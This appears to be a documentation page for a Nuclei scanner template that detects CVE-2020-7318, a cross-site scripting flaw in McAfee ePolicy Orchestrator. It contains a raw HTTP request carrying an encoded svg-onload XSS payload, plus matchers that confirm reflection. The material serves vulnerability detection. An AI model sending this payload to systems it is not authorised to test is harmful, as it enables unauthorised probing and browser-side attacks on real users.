McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
ID: CVE-2020-7318
Severity: medium
Author: dwisiswant0
Tags: cve,cve2020,xss,mcafee
Description
Section titled “Description”McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator’s entries were not correctly sanitized.reference:- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/- https://kc.mcafee.com/corporate/index?page=content&id=SB10332- https://nvd.nist.gov/vuln/detail/CVE-2020-7318
YAML Source
Section titled “YAML Source”id: CVE-2020-7318
info: name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting author: dwisiswant0 severity: medium description: | McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized. reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://nvd.nist.gov/vuln/detail/CVE-2020-7318 impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions. remediation: | Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00065 epss-percentile: 0.28395 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mcafee product: epolicy_orchestrator tags: cve,cve2020,xss,mcafee
http: - raw: - | GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} Connection: close
matchers-condition: and matchers: - type: word part: header words: - "text/html"
- type: word part: body words: - "Policy Name" - "'\"><svg/onload=alert(document.domain)>" condition: and
- type: status status: - 200# digest: 4b0a004830460221008ad73ca8bb4956cec9dec82b76dca8a834f57fde805663769ace86da2a6be91b022100bed107fa9000c6864bfd87dcf13cb3f1494737d78171ac114de914193496347d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-7318.yaml"